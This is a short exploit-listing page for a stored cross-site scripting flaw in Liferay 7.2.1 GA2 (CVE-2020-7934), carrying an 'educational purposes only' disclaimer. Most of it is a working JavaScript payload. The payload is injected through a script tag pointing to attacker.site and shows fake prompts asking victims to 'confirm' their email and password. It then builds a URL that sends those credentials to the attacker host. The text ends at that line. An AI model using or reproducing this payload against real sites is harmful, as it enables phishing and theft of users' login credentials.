Exploits / Vulnerability Discovered : 2020-11-23 |
Type : webapps |
Platform : multiple
This exploit / vulnerability Liferay 7.2.1 ga2 stored xss is for educational purposes only and if it is used you will do on your own risk!
// Host this payload with your site and paste in this script tag into a vulnerable field with your URL replaced where relevant:
// <SCRIPT SRC="//attacker.site/cve-2020-7934.js">
var email = prompt("To process this search we need you to confirm your credentials.\n\nPlease confirm your email:", "");
var password = prompt("To process this search we need you to confirm your credentials.\n\nPlease confirm your password:", "");
console.log(email);
console.log(password);
var url = "http://attacker.site/" + email + ":" + password;